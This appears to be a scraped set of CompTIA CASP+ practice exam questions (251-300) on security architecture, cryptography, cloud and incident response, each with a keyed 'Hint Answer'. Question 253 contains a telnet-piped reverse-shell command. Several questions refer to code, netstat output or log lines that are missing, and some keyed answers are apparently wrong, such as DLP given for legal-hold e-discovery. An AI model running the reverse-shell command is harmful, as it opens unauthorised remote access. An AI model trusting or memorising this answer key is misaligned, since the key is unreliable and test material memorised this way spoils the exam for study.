CompTIA Advanced Security Practitioner Topic 6
Question #: 251
Topic #: 1
A company wants to securely manage the APIs that were developed for its in-house applications. Previous penetration tests revealed that developers were embedding unencrypted passwords in the code. Which of the following can the company do to address this finding? (Choose two.)
A. Implement complex, key-length API key management.
B. Implement user session logging.
C. Implement time-based API key management.
D. Use SOAP instead of RESTful services.
E. Incorporate a DAST into the DevSecOps process to identify the exposure of secrets.
F. Enforce MFA on the developers’ workstations and production systems.
Hint Answer: AC
Question #: 252
Topic #: 1
When a remote employee traveled overseas, the employee’s laptop and several mobile devices with proprietary tools were stolen. The security team requires technical controls be in place to ensure no electronic data is compromised or changed. Which of the following BEST meets this requirement?
A. Mobile device management with remote wipe capabilities
B. Passwordless smart card authorization with biometrics
C. Next-generation endpoint detection and response agent
D. Full disk encryption with centralized key management
Hint Answer: D
Question #: 253
Topic #: 1
A penetration tester inputs the following command:
telnet 192.168.99.254 343 ! /bin/bash | telnet 192.168.99.254 344
This command will allow the penetration tester to establish a:
A. port mirror.
B. network pivot.
C. reverse shell.
D. proxy chain.
Hint Answer: C
Question #: 254
Topic #: 1
Which of the following is the MOST important cloud-specific risk from the CSP’s viewpoint?
A. CI/CD deployment failure
B. Management plane breach
C. Insecure data deletion
D. Resource exhaustion
Hint Answer: B
Question #: 255
Topic #: 1
A security engineer is reviewing a record of events after a recent data breach incident that involved the following:
• A hacker conducted reconnaissance and developed a footprint of the company’s Internet-facing web application assets.
• A vulnerability in a third-party library was exploited by the hacker, resulting in the compromise of a local account.
• The hacker took advantage of the account’s excessive privileges to access a data store and exfiltrate the data without detection.
Which of the following is the BEST solution to help prevent this type of attack from being successful in the future?
A. Dynamic analysis
B. Secure web gateway
C. Software composition analysis
D. User behavior analysis
E. Stateful firewall
Hint Answer: C
Question #: 256
Topic #: 1
A security architect updated the security policy to require a proper way to verify that packets received between two parties have not been tampered with and the connection remains private. Which of the following cryptographic techniques can be used to ensure the security policy is being enforced properly?
A. MD5-based envelope method
B. HMAC_SHA256
C. PBKDF2
D. PGP
Hint Answer: B
Question #: 257
Topic #: 1
A software assurance analyst reviews an SSH daemon’s source code and sees the following:
Based on this code snippet, which of the following attacks is MOST likely to succeed?
A. Race condition
B. Cross-site scripting
C. Integer overflow
D. Driver shimming
Hint Answer: C
Question #: 258
Topic #: 1
A security analyst for a managed service provider wants to implement the most up-to-date and effective security methodologies to provide clients with the best offerings. Which of the following resources would the analyst MOST likely adopt?
A. OSINT
B. ISO
C. MITRE ATT&CK
D. OWASP
Hint Answer: B
Question #: 259
Topic #: 1
A security manager wants to transition the organization to a zero trust architecture. To meet this requirement, the security manager has instructed administrators to remove trusted zones, role-based access, and one-time authentication. Which of the following will need to be implemented to achieve this objective? (Choose three.)
A. Least privilege
B. VPN
C. Policy automation
D. PKI
E. Firewall
F. Continuous validation
G. Continuous integration
H. IaaS
Hint Answer: ACF
Question #: 260
Topic #: 1
A security architect for a manufacturing company must ensure that a new acquisition of IoT devices is securely integrated into the company’s infrastructure. The devices should not directly communicate with other endpoints on the network and must be subject to network traffic monitoring to identify anomalous traffic. Which of the following would be the BEST solution to meet these requirements?
A. Block all outbound traffic and implement an inline firewall.
B. Allow only wireless connections and proxy the traffic through a network tap.
C. Establish an air-gapped network and implement an IDS.
D. Use a separate VLAN with an ACL and implement network detection and response.
Hint Answer: D
Question #: 261
Topic #: 1
A digital forensics expert has obtained an ARM binary suspected of including malicious behavior. The expert would like to trace and analyze the ARM binary’s execution. Which of the following tools would BEST support this effort?
A. objdump
B. OllyDbg
C. FTK Imager
D. Ghidra
Hint Answer: D
Question #: 262
Topic #: 1
A software developer was just informed by the security team that the company’s product has several vulnerabilities. Most of these vulnerabilities were traced to code the developer did not write. The developer does not recognize some of the code, as it was in the software before the developer started on the program and is not tracked for licensing purposes. Which of the following would the developer MOST likely do to mitigate the risks and prevent further issues like these from occurring?
A. Perform supply chain analysis and require third-party suppliers to implement vulnerability management programs.
B. Perform software composition analysis and remediate vulnerabilities found in the software.
C. Perform reverse engineering on the code and rewrite the code in a more secure manner.
D. Perform fuzz testing and implement DAST in the code repositories to find vulnerabilities prior to deployment.
Hint Answer: B
Question #: 263
Topic #: 1
A significant weather event caused all systems to fail over to the disaster recovery site successfully. However, successful data replication has not occurred in the last six months, which has resulted in the service being unavailable. Which of the following would BEST prevent this scenario from happening again?
A. Performing routine tabletop exercises
B. Implementing scheduled, full interruption tests
C. Backing up system log reviews
D. Performing department disaster recovery walk-throughs
Hint Answer: B
Question #: 264
Topic #: 1
An organization developed an incident response plan. Which of the following would be BEST to assess the effectiveness of the plan?
A. Requesting a third-party review
B. Generating a checklist by organizational unit
C. Establishing role succession and call lists
D. Creating a playbook
E. Performing a tabletop exercise
Hint Answer: E
Question #: 265
Topic #: 1
A new mandate by the corporate security team requires that all endpoints must meet a security baseline before accessing the corporate network. All servers and desktop computers are scanned by the dedicated internal scanner appliance installed in each subnet. However, remote worker laptops do not access the network regularly. Which of the following is the BEST option for the security team to ensure remote worker laptops are scanned before being granted access to the corporate network?
A. Implement network access control to perform host validation of installed patches.
B. Create an 802.1X implementation with certificate-based device identification.
C. Create a vulnerability scanning subnet for remote workers to connect to on the network at headquarters.
D. Install a vulnerability scanning agent on each remote laptop to submit scan data.
Hint Answer: D
Question #: 266
Topic #: 1
A penetration tester is testing a company’s login form for a web application using a list of known usernames and a common password list. According to a brute-force utility, the penetration tester needs to provide the tool with the proper headers, POST URL with variable names, and the error string returned with an improper login. Which of the following would BEST help the tester to gather this information? (Choose two.)
A. The new source feature of the web browser
B. The logs from the web server
C. The inspect feature from the web browser
D. A tcpdump from the web server
E. An HTTP interceptor
F. The website certificate viewed via the web browser
Hint Answer: CE
Question #: 267
Topic #: 1
A security analyst has concerns about malware on an endpoint. The malware is unable to detonate by modifying the kernel response to various system calls. As a test, the analyst modifies a Windows server to respond to system calls as if it was a Linux server. In another test, the analyst modifies the operating system to prevent the malware from identifying target files. Which of the following techniques is the analyst MOST likely using?
A. Honeypot
B. Deception
C. Simulators
D. Sandboxing
Hint Answer: B
Question #: 268
Topic #: 1
Users are claiming that a web server is not accessible. A security engineer is unable to view the Internet Services logs for the site. The engineer connects to the server and runs netstat -an and receives the following output:
Which of the following is MOST likely happening to the server?
A. Port scanning
B. ARP spoofing
C. Buffer overflow
D. Denial of service
Hint Answer: D
Question #: 269
Topic #: 1
An architect is designing a security scheme for an organization that is concerned about APTs. Any proposed architecture must meet the following requirements:
• Services must be able to be reconstituted quickly from a known-good state.
• Network services must be designed to ensure multiple diverse layers of redundancy.
• Defensive and responsive actions must be automated to reduce human operator demands.
Which of the following designs must be considered to ensure the architect meets these requirements? (Choose three.)
A. Increased efficiency by embracing advanced caching capabilities
B. Geographic distribution of critical data and services
C. Hardened and verified container usage
D. Emulated hardware architecture usage
E. Establishment of warm and hot sites for continuity of operations
F. Heterogeneous architecture
G. Deployment of IPS services that can identify and block malicious traffic
H. Implementation and configuration of a SOAR
Hint Answer: BEH
Question #: 270
Topic #: 1
A company is on a deadline to roll out an entire CRM platform to all users at one time. However, the company is behind schedule due to reliance on third-party vendors. Which of the following development approaches will allow the company to begin releases but also continue testing and development for future releases?
A. Implement iterative software releases
B. Revise the scope of the project to use a waterfall approach.
C. Change the scope of the project to use the spiral development methodology.
D. Perform continuous integration.
Hint Answer: A
Question #: 271
Topic #: 1
A third-party organization has implemented a system that allows it to analyze customers’ data and deliver analysis results without being able to see the raw data. Which of the following is the organization implementing?
A. Asynchronous keys
B. Homomorphic encryption
C. Data lake
D. Machine learning
Hint Answer: B
Question #: 272
Topic #: 1
Which of the following communication protocols is used to create PANs with small, low-power digital radios and supports a large number of nodes?
A. Zigbee
B. Wi-Fi
C. CAN
D. Modbus
E. DNP3
Hint Answer: A
Question #: 273
Topic #: 1
A software development company is building a new mobile application for its social media platform. The company wants to gain its users’ trust by reducing the risk of on-path attacks between the mobile client and its servers and by implementing stronger digital trust. To support users’ trust, the company has released the following internal guidelines:
• Mobile clients should verify the identity of all social media servers locally.
• Social media servers should improve TLS performance of their certificate status.
• Social media servers should inform the client to only use HTTPS.
Given the above requirements, which of the following should the company implement? (Choose two.)
A. Quick UDP internet connection
B. OCSP stapling
C. Private CA
D. DNSSEC
E. CRL
F. HSTS
G. Distributed object model
Hint Answer: BF
Question #: 274
Topic #: 1
Due to budget constraints, an organization created a policy that only permits vulnerabilities rated high and critical according to CVSS to be fixed or mitigated. A security analyst notices that many vulnerabilities that were previously scored as medium are now breaching higher thresholds. Upon further investigation, the analyst notices certain ratings are not aligned with the approved system categorization.
Which of the following can the analyst do to get a better picture of the risk while adhering to the organization’s policy?
A. Align the exploitability metrics to the predetermined system categorization.
B. Align the remediation levels to the predetermined system categorization.
C. Align the impact subscore requirements to the predetermined system categorization.
D. Align the attack vectors to the predetermined system categorization.
Hint Answer: C
Question #: 275
Topic #: 1
A cloud engineer is tasked with improving the responsiveness and security of a company’s cloud-based web application. The company is concerned that international users will experience increased latency.
Which of the following is the BEST technology to mitigate this concern?
A. Caching
B. Containerization
C. Content delivery network
D. Clustering
Hint Answer: C
Question #: 276
Topic #: 1
An organization thinks that its network has active, malicious activity on it. Which of the following capabilities would BEST help to expose the adversary?
A. Installing a honeypot and other decoys
B. Expanding SOC functions to include hunting
C. Enumerating asset configurations
D. Performing a penetration test
Hint Answer: A
Question #: 277
Topic #: 1
An engineering team has deployed a new VPN service that requires client certificates to be used in order to successfully connect. On iOS devices, however, the following error occurs after importing the .p12 certificate file:
mbedTLS: ca certificate is undefined
Which of the following is the root cause of this issue?
A. iOS devices have an empty root certificate chain by default.
B. OpenSSL is not configured to support PKCS#12 certificate files.
C. The VPN client configuration is missing the CA private key.
D. The iOS keychain imported only the client public and private keys.
Hint Answer: D
Question #: 278
Topic #: 1
A security engineer has been informed by the firewall team that a specific Windows workstation is part of a command-and-control network. The only information the security engineer is receiving is that the traffic is occurring on a non-standard port (TCP 40322). Which of the following commands should the security engineer use FIRST to find the malicious process?
A. tcpdump
B. netstat
C. tasklist
D. traceroute
E. ipconfig
Hint Answer: B
Question #: 279
Topic #: 1
In a shared responsibility model for PaaS, which of the following is a customer’s responsibility?
A. Network security
B. Physical security
C. OS security
D. Host infrastructure
Hint Answer: C
Question #: 280
Topic #: 1
A security engineer notices the company website allows users to select which country they reside in, such as the following example:
https://mycompany.com/main.php?Country=US
Which of the following vulnerabilities would MOST likely affect this site?
A. SQL injection
B. Remote file inclusion
C. Directory traversal
D. Unsecure references
Hint Answer: D
Question #: 281
Topic #: 1
A bank has multiple subsidiaries that have independent infrastructures. The bank’s support teams manage all these environments and want to use a single set of credentials. Which of the following is the BEST way to achieve this goal?
A. SSO
B. Federation
C. Cross-domain
D. Shared credentials
Hint Answer: B
Question #: 282
Topic #: 1
A SaaS startup is maturing its DevSecOps program and wants to identify weaknesses earlier in the development process in order to reduce the average time to identify serverless application vulnerabilities and the costs associated with remediation. The startup began its early security testing efforts with DAST to cover public-facing application components and recently implemented a bug bounty program. Which of the following will BEST accomplish the company’s objectives? (Choose two.)
A. IAST
B. RASP
C. SAST
D. SCA
E. WAF
F. CMS
Hint Answer: AD
Question #: 283
Topic #: 1
Which of the following indicates when a company might not be viable after a disaster?
A. Maximum tolerable downtime
B. Recovery time objective
C. Mean time to recovery
D. Annual loss expectancy
Hint Answer: A
Question #: 284
Topic #: 1
During an incident, an employee’s web traffic was redirected to a malicious domain. The workstation was compromised, and the attacker was able to modify sensitive data from the company file server. Which of the following solutions would have BEST prevented the initial compromise from happening? (Choose two.)
A. DNSSEC
B. FIM
C. Segmentation
D. Firewall
E. DLP
F. Web proxy
Hint Answer: AC
Question #: 285
Topic #: 1
A software company wants to build a platform by integrating with another company’s established product. Which of the following provisions would be MOST important to include when drafting an agreement between the two companies?
A. Data sovereignty
B. Shared responsibility
C. Source code escrow
D. Safe harbor considerations
Hint Answer: B
Question #: 286
Topic #: 1
A security administrator sees several hundred entries in a web server security log that are similar to the following:
The network source varies, but the URL, status, and user agent are the same. Which of the following would BEST protect the web server without blocking legitimate traffic?
A. Replace the file xmlrpc.php with a honeypot form to collect further IOCs.
B. Automate the addition of bot IP addresses into a deny list for the web host.
C. Script the daily collection of the WHOIS ranges to add to the WAF as a denied ACL.
D. Block every subnet that is identified as having a bot that is a source of the traffic.
Hint Answer: B
Question #: 287
Topic #: 1
An organization had been leveraging RC4 to protect the confidentiality of a continuous, high-throughput 4K video stream but must upgrade to a more modern cipher. The new cipher must maximize speed, particularly on endpoints without crypto instruction sets or coprocessors. Which of the following is MOST likely to meet the organization’s requirements?
A. ChaCha20
B. ECDSA
C. Blowfish
D. AES-GCM
E. AES-CBC
Hint Answer: A
Question #: 288
Topic #: 1
Which of the following processes involves searching and collecting evidence during an investigation or lawsuit?
A. E-discovery
B. Review analysis
C. Information governance
D. Chain of custody
Hint Answer: A
Question #: 289
Topic #: 1
A domestic, publicly traded, online retailer that sells makeup would like to reduce the risks to the most sensitive type of data within the organization but also the impact to compliance. A risk analyst is performing an assessment of the collection and processing of data used within business processes. Which of the following types of data pose the GREATEST risk? (Choose two.)
A. Financial data from transactions
B. Shareholder meeting minutes
C. Data of possible European customers
D. Customers’ shipping addresses
E. Deidentified purchasing habits
F. Consumer product purchasing trends
Hint Answer: AC
Question #: 290
Topic #: 1
A security engineer is creating a single CSR for the following web server hostnames:
• wwwint.internal
• www.company.com
• home.internal
• www.internal
Which of the following would meet the requirement?
A. SAN
B. CN
C. CA
D. CRL
E. Issuer
Hint Answer: A
Question #: 291
Topic #: 1
A managed security provider (MSP) is engaging with a customer who was working through a complete digital transformation. Part of this transformation involves a move to cloud servers to ensure a scalable, high-performance, online user experience. The current architecture includes:
• Directory servers
• Web servers
• Database servers
• Load balancers
• Cloud-native VPN concentrator
• Remote access server
The MSP must secure this environment similarly to the infrastructure on premises. Which of the following should the MSP put in place to BEST meet this objective? (Choose three.)
A. Content delivery network
B. Virtual next-generation firewall
C. Web application firewall
D. Software-defined WAN
E. External vulnerability scans
F. Containers
Hint Answer: BCE
Question #: 292
Topic #: 1
A security analyst has been tasked with providing key information in the risk register. Which of the following outputs or results would be used to BEST provide the information needed to determine the security posture for a risk decision? (Choose two.)
A. Password cracker
B. SCAP scanner
C. Network traffic analyzer
D. Vulnerability scanner
E. Port scanner
F. Protocol analyzer
Hint Answer: BD
Question #: 293
Topic #: 1
An organization is in frequent litigation and has a large number of legal holds. Which of the following types of functionality should the organization’s new email system provide?
A. DLP
B. Encryption
C. E-discovery
D. Privacy-level agreements
Hint Answer: A
Question #: 294
Topic #: 1
A security engineer based in Iceland works in an environment requiring an on-premises and cloud-based storage solution. The solution should take into consideration the following:
1. The company has sensitive data.
2. The company has proprietary data.
3. The company has its headquarters in Iceland, and the data must always reside in that country.
Which cloud deployment model should be used?
A. Hybrid cloud
B. Community cloud
C. Public cloud
D. Private cloud
Hint Answer: D
Question #: 295
Topic #: 1
When managing and mitigating SaaS cloud vendor risk, which of the following responsibilities belongs to the client?
A. Data
B. Storage
C. Physical security
D. Network
Hint Answer: A
Question #: 296
Topic #: 1
Which of the following should be established when configuring a mobile device to protect user internet privacy, to ensure the connection is encrypted, and to keep user activity hidden? (Choose two.)
A. Proxy
B. Tunneling
C. VDI
D. MDM
E. RDP
F. MAC address randomization
Hint Answer: AB
Question #: 298
Topic #: 1
An organization does not have visibility into when company-owned assets are off network or not connected via a VPN. The lack of visibility prevents the organization from meeting security and operational objectives. Which of the following cloud-hosted solutions should the organization implement to help mitigate the risk?
A. Antivirus
B. UEBA
C. EDR
D. HIDS
Hint Answer: C
Question #: 299
Topic #: 1
A company has retained the services of a consultant to perform a security assessment. As part of the assessment, the consultant recommends engaging with others in the industry to collaborate regarding emerging attacks. Which of the following would BEST enable this activity?
A. ISAC
B. OSINT
C. CVSS
D. Threat modeling
Hint Answer: A
Question #: 300
Topic #: 1
A law firm experienced a breach in which access was gained to a secure server. During an investigation to determine how the breach occurred, an employee admitted to clicking on a spear-phishing link. A security analyst reviewed the event logs and found the following:
• PAM had not been bypassed.
• DLP did not trigger any alerts.
• The antivirus was updated to the most current signatures.
Which of the following MOST likely occurred?
A. Exploitation
B. Exfiltration
C. Privilege escalation
D. Lateral movement
Hint Answer: D